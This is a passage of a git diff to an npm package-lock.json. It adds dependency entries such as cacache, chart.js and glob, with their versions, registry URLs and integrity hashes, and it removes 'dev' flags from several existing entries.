"sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", - "dev": true - }, "node_modules/@babel/types": { "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.0.0-rc.1.tgz", "integrity": "sha512-MBwO1JQKin9BwKTGydrYe4VDJbStCUy35IhJzeZt3FByOdx/q3CYaqMRrH70qVD2RA7+Xk8e3RN0mzKZkYBYuQ==", - "dev": true, "dependencies": { "esutils": "^2.0.2", "lodash": "^4.17.10", "to-fast-properties": "^2.0.0" } }, - "node_modules/@babel/types/node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", - "dev": true + "node_modules/@gar/promisify": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@gar/promisify/-/promisify-1.1.3.tgz", + "integrity": "sha512-k2Ty1JcVojjJFwrg/ThKi2ujJ7XNLYaFGNB/bWT9wGR+oSMJHMa5w+CUq6p/pVrKeNNgA7pCqEcjSnHVoqJQFw==", + "optional": true + }, + "node_modules/@npmcli/fs": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@npmcli/fs/-/fs-1.1.1.tgz", + "integrity": "sha512-8KG5RD0GVP4ydEzRn/I4BNDuxDtqVbOdm8675T49OIG/NGhaK0pjPX7ZcDlvKYbA+ulvVK3ztfcF4uBdOxuJbQ==", + "optional": true, + "dependencies": { + "@gar/promisify": "^1.0.1", + "semver": "^7.3.5" + } + }, + "node_modules/@npmcli/move-file": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@npmcli/move-file/-/move-file-1.1.2.tgz", + "integrity": "sha512-1SUf/Cg2GzGDyaf15aR9St9TWlb+XvbZXWpDx8YKs7MLzMH/BCeopv+y9vzrzgkfykCGuWOlSu3mZhj2+FQcrg==", + "deprecated": "This functionality has been moved to @npmcli/fs", + "optional": true, + "dependencies": { + "mkdirp": "^1.0.4", + "rimraf": "^3.0.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@tootallnate/once": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-1.1.2.tgz", + "integrity": "sha512-RbzJvlNzmRq5c3O09UipeuXno4tA1FE6ikOjxZK0tuxVv3412l64l5t1W5pj4+rJq9vpkm/kwiR07aZXnsKPxw==", + "optional": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@types/geojson": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/@types/geojson/-/geojson-1.0.6.tgz", + "integrity": "sha512-Xqg/lIZMrUd0VRmSRbCAewtwGZiAk3mEUDvV4op1tGl+LvyPcb/MIOSxTl9z+9+J+R4/vpjiCAT4xeKzH9ji1w==" + }, + "node_modules/@types/node": { + "version": "22.5.5", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.5.5.tgz", + "integrity": "sha512-Xjs4y5UPO/CLdzpgR6GirZJx36yScjh73+2NlLlkFRSoQN8B0DpfXPdZGnvVmLRLOsqDpOfTNv7D9trgGhmOIA==", + "dependencies": { + "undici-types": "~6.19.2" + } + }, + "node_modules/abbrev": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", + "integrity": "sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==", + "optional": true + }, + "node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "optional": true, + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/agent-base/node_modules/debug": { + "version": "4.3.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz", + "integrity": "sha512-Er2nc/H7RrMXZBFCEim6TCmMk02Z8vLC2Rbi1KEBggpo0fS6l0S1nnapwmIi3yW/+GOJap1Krg4w0Hg80oCqgQ==", + "optional": true, + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/agentkeepalive": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/agentkeepalive/-/agentkeepalive-4.5.0.tgz", + "integrity": "sha512-5GG/5IbQQpC9FpkRGsSvZI5QYeSCzlJHdpBQntCsuTOxhKD8lqKhrleg2Yi7yvMIf82Ycmmqln9U8V9qwEiJew==", + "optional": true, + "dependencies": { + "humanize-ms": "^1.2.1" + }, + "engines": { + "node": ">= 8.0.0" + } + }, + "node_modules/aggregate-error": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/aggregate-error/-/aggregate-error-3.1.0.tgz", + "integrity": "sha512-4I7Td01quW/RpocfNayFdFVk1qSuoh0E7JrbRJ16nH01HhKFQ88INq9Sd+nd72zqRySlr9BmDA8xlEJ6vJMrYA==", + "optional": true, + "dependencies": { + "clean-stack": "^2.0.0", + "indent-string": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "optional": true, + "engines": { + "node": ">=8" + } }, "node_modules/ansi-styles": { "version": "3.2.1", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, "dependencies": { "color-convert": "^1.9.0" }, @@ -204,11 +297,140 @@ "node": ">=4" } }, + "node_modules/aproba": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", + "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", + "optional": true + }, + "node_modules/are-we-there-yet": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-3.0.1.tgz", + "integrity": "sha512-QZW4EDmGwlYur0Yyf/b2uGucHQMa8aFUP7eu9ddR73vvhFyt4V0Vl3QHPcTNJ8l6qYOBdxgXdnBXQrHilfRQBg==", + "deprecated": "This package is no longer supported.", + "optional": true, + "dependencies": { + "delegates": "^1.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": "^12.13.0 || ^14.15.0 || >=16.0.0" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "optional": true + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "dependencies": { + "file-uri-to-path": "1.0.0" + } + }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/bluebird": { + "version": "3.7.2", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.7.2.tgz", + "integrity": "sha512-XpNj6GDQzdfW+r2Wnn7xiSAd7TM3jzkxGXBGTtWKuSXv1xUV+azxAm8jdWZN06QTQk+2N2XB9jRDkvbmQmcRtg==" + }, + "node_modules/brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "optional": true, + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/cacache": { + "version": "15.3.0", + "resolved": "https://registry.npmjs.org/cacache/-/cacache-15.3.0.tgz", + "integrity": "sha512-VVdYzXEn+cnbXpFgWs5hTT7OScegHVmLhJIR8Ufqk3iFD6A6j5iSX1KuBTfNEv4tdJWE2PzA6IVFtcLC7fN9wQ==", + "optional": true, + "dependencies": { + "@npmcli/fs": "^1.0.0", + "@npmcli/move-file": "^1.0.1", + "chownr": "^2.0.0", + "fs-minipass": "^2.0.0", + "glob": "^7.1.4", + "infer-owner": "^1.0.4", + "lru-cache": "^6.0.0", + "minipass": "^3.1.1", + "minipass-collect": "^1.0.2", + "minipass-flush": "^1.0.5", + "minipass-pipeline": "^1.2.2", + "mkdirp": "^1.0.3", + "p-map": "^4.0.0", + "promise-inflight": "^1.0.1", + "rimraf": "^3.0.2", + "ssri": "^8.0.1", + "tar": "^6.0.2", + "unique-filename": "^1.1.1" + }, + "engines": { + "node": ">= 10" + } + }, "node_modules/chalk": { "version": "2.4.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, "dependencies": { "ansi-styles": "^3.2.1", "escape-string-regexp": "^1.0.5", @@ -218,41 +440,236 @@ "node": ">=4" } }, + "node_modules/chart.js": { + "version": "2.8.0", + "resolved": "https://registry.npmjs.org/chart.js/-/chart.js-2.8.0.tgz", + "integrity": "sha512-Di3wUL4BFvqI5FB5K26aQ+hvWh8wnP9A3DWGvXHVkO13D3DSnaSsdZx29cXlEsYKVkn1E2az+ZYFS4t0zi8x0w==", + "dependencies": { + "chartjs-color": "^2.1.0", + "moment": "^2.10.2" + } + }, + "node_modules/chartist": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/chartist/-/chartist-0.3.0.tgz", + "integrity": "sha512-mQuyWZLXMRDcIEawKTsmNxDH14YwiAXPmRlW3yyS7sLyx+zOYDgxWyKuLwsooX49jUcZw7JXSeaEA/WwdGRfzg==", + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/chartjs-color": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/chartjs-color/-/chartjs-color-2.4.1.tgz", + "integrity": "sha512-haqOg1+Yebys/Ts/9bLo/BqUcONQOdr/hoEr2LLTRl6C5LXctUdHxsCYfvQVg5JIxITrfCNUDr4ntqmQk9+/0w==", + "dependencies": { + "chartjs-color-string": "^0.6.0", + "color-convert": "^1.9.3" + } + }, + "node_modules/chartjs-color-string": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/chartjs-color-string/-/chartjs-color-string-0.6.0.tgz", + "integrity": "sha512-TIB5OKn1hPJvO7JcteW4WY/63v6KwEdt6udfnDE9iCAZgy+V4SrbSxoIbTw/xkUIapjEI4ExGtD0+6D3KyFd7A==", + "dependencies": { + "color-name": "^1.0.0" + } + }, + "node_modules/chownr": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", + "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "engines": { + "node": ">=10" + } + }, + "node_modules/clean-stack": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/clean-stack/-/clean-stack-2.2.0.tgz", + "integrity": "sha512-4diC9HaTE+KRAMWhDhrGOECgWZxoevMc5TlkObMqNSsVU62PYzXZ/SMTjzyGAFF1YusgxGcSWTEXBhp0CPwQ1A==", + "optional": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/cls-bluebird": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/cls-bluebird/-/cls-bluebird-2.1.0.tgz", + "integrity": "sha512-XVb0RPmHQyy35Tz9z34gvtUcBKUK8A/1xkGCyeFc9B0C7Zr5SysgFaswRVdwI5NEMcO+3JKlIDGIOgERSn9NdA==", + "dependencies": { + "is-bluebird": "^1.0.2", + "shimmer": "^1.1.0" + } + }, "node_modules/color-convert": { "version": "1.9.3", "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, "dependencies": { "color-name": "1.1.3" } }, - "node_modules/color-name": { + "node_modules/color-convert/node_modules/color-name": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true + "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==" + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "node_modules/color-support": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", + "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", + "optional": true, + "bin": { + "color-support": "bin.js" + } + }, + "node_modules/component-props": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/component-props/-/component-props-1.1.1.tgz", + "integrity": "sha512-69pIRJs9fCCHRqCz3390YF2LV1Lu6iEMZ5zuVqqUn+G20V9BNXlMs0cWawWeW9g4Ynmg29JmkG6R7/lUJoGd1Q==" + }, + "node_modules/component-xor": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/component-xor/-/component-xor-0.0.4.tgz", + "integrity": "sha512-ZIt6sla8gfo+AFVRZoZOertcnD5LJaY2T9CKE2j13NJxQt/mUafD69Bl7/Y4AnpI2LGjiXH7cOfJDx/n2G9edA==" + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "optional": true + }, + "node_modules/console-control-strings": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", + "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", + "optional": true }, "node_modules/convert-source-map": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true + "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==" }, "node_modules/debug": { "version": "3.2.7", "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", - "dev": true, "dependencies": { "ms": "^2.1.1" } }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/deep-extend": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", + "integrity": "sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/delegates": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz", + "integrity": "sha512-bd2L678uiWATM6m5Z1VzNCErI3jiGzt6HGY8OVICs40JQq/HALfbyNJmp0UDakEY4pMMaN0Ly5om/B1VI/+xfQ==", + "optional": true + }, + "node_modules/denque": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/denque/-/denque-2.1.0.tgz", + "integrity": "sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==", + "engines": { + "node": ">=0.10" + } + }, + "node_modules/depd": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/depd/-/depd-1.1.2.tgz", + "integrity": "sha512-7emPTl6Dpo6JRXOXjLRxck+FlLRX5847cLKEn00PLAgc3g2hTZZgr+e4c2v6QpSmLeFP3n5yUo7ft6avBK/5jQ==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/detect-libc": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.3.tgz", + "integrity": "sha512-bwy0MGW55bG41VqxxypOsdSdGqLwXPI/focwgTYCFMbdUiBAxLg9CFzG08sz2aqzknwiX7Hkl0bQENjg8iLByw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/dom-iterator": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/dom-iterator/-/dom-iterator-1.0.0.tgz", + "integrity": "sha512-7dsMOQI07EMU98gQM8NSB3GsAiIeBYIPKpnxR3c9xOvdvBjChAcOM0iJ222I3p5xyiZO9e5oggkNaCusuTdYig==", + "dependencies": { + "component-props": "1.1.1", + "component-xor": "0.0.4" + } + }, + "node_modules/dottie": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/dottie/-/dottie-2.0.6.tgz", + "integrity": "sha512-iGCHkfUc5kFekGiqhe8B/mdaurD+lakO9txNnTvKtA6PISrw86LgqHvRzWYPyoE2Ph5aMIrCw9/uko6XHTKCwA==" + }, + "node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "optional": true + }, + "node_modules/encoding": { + "version": "0.1.13", + "resolved": "https://registry.npmjs.org/encoding/-/encoding-0.1.13.tgz", + "integrity": "sha512-ETBauow1T35Y/WZMkio9jiM0Z5xjHHmJ4XmjZOq1l/dXz3lr2sRn87nJy20RupqSh1F2m3HHPSp8ShIPQJrJ3A==", + "optional": true, + "dependencies": { + "iconv-lite": "^0.6.2" + } + }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, + "node_modules/env-paths": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/env-paths/-/env-paths-2.2.1.tgz", + "integrity": "sha512-+h1lkLKhZMTYjog1VEpJNG7NZJWcuc2DDk/qsqSTRRCOXiLjeQ1d1/udrUGhqMxUgAlwKNZ0cf2uqan5GLuS2A==", + "optional": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/err-code": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/err-code/-/err-code-2.0.3.tgz", + "integrity": "sha512-2bmlRpNKBxT/CRmPOlyISQpNj+qSeYvcym/uT0Jx2bMOlKLtSy1ZmLuVxSEKKyor/N5yhvp/ZiG1oE3DEYMSFA==", + "optional": true + }, "node_modules/escape-string-regexp": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, "engines": { "node": ">=0.8.0" } @@ -261,43 +678,147 @@ "version": "2.0.3", "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, "engines": { "node": ">=0.10.0" } }, + "node_modules/expand-template": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/expand-template/-/expand-template-2.0.3.tgz", + "integrity": "sha512-XYfuKMvj4O35f/pOXLObndIRvyQ+/+6AhODh+OKWj9S9498pHHn/IMszH+gt0fBCRWMNfk1ZSp5x3AifmnI2vg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==" + }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==" + }, + "node_modules/fs-minipass": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", + "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "optional": true + }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, "funding": { "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/gauge": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/gauge/-/gauge-4.0.4.tgz", + "integrity": "sha512-f9m+BEN5jkg6a0fZjleidjN51VE1X+mPFQ2DJ0uv1V39oCLCbsGe6yjbBnp7eK7z/+GAon99a3nHuqbuuthyPg==", + "deprecated": "This package is no longer supported.", + "optional": true, + "dependencies": { + "aproba": "^1.0.3 || ^2.0.0", + "color-support": "^1.1.3", + "console-control-strings": "^1.1.0", + "has-unicode": "^2.0.1", + "signal-exit": "^3.0.7", + "string-width": "^4.2.3", + "strip-ansi": "^6.0.1", + "wide-align": "^1.1.5" + }, + "engines": { + "node": "^12.13.0 || ^14.15.0 || >=16.0.0" + } + }, + "node_modules/generate-function": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/generate-function/-/generate-function-2.3.1.tgz", + "integrity": "sha512-eeB5GfMNeevm/GRYq20ShmsaGcmI81kIX2K9XQx5miC8KdHaC6Jm0qQ8ZNeGOi7wYB8OsdxKs+Y2oVuTFuVwKQ==", + "dependencies": { + "is-property": "^1.0.2" + } + }, + "node_modules/generic-pool": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/generic-pool/-/generic-pool-3.5.0.tgz", + "integrity": "sha512-dEkxmX+egB2o4NR80c/q+xzLLzLX+k68/K8xv81XprD+Sk7ZtP14VugeCz+fUwv5FzpWq40pPtAkzPRqT8ka9w==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/github-from-package": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/github-from-package/-/github-from-package-0.0.0.tgz", + "integrity": "sha512-SyHy3T1v2NUXn29OsWdxmK6RwHD+vkj3v8en8AOBZ1wBQ/hCAQ5bAQTD02kW4W9tUp/3Qh6J8r9EvntiyCmOOw==" + }, + "node_modules/glob": { + "version": "7.2.3", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", + "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "deprecated": "Glob versions prior to v9 are no longer supported", + "optional": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.1.1", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/globals": { "version": "11.12.0", "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, "engines": { "node": ">=4" } }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "optional": true + }, "node_modules/has-flag": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, "engines": { "node": ">=4" } }, + "node_modules/has-unicode": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", + "integrity": 